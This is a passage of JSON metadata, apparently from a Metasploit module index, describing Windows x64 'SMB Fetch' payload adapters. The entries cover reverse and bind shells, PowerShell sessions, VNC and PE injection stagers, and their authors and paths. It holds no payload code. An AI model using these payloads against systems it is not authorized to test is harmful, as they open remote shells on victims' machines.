"targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_tcp_rc4": { - "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_tcp_uuid": { - "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/pingback_reverse_tcp": { - "name": "SMB Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/smb/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/powershell_bind_tcp": { - "name": "SMB Fetch", - "fullname": "payload/cmd/windows/smb/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/powershell_reverse_tcp": { - "name": "SMB Fetch", - "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/powershell_reverse_tcp_ssl": { - "name": "SMB Fetch", - "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/shell/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/shell/bind_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/shell/bind_tcp_rc4": { - "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/shell/bind_tcp_uuid": { - "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/shell/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/shell/reverse_tcp_rc4": { - "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/shell/reverse_tcp_uuid": { - "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/shell_bind_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/smb/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/shell_reverse_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/smb/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_tcp": { - "name": "SMB Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_tcp_rc4": { - "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_tcp_uuid": { - "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_http": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_https": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - 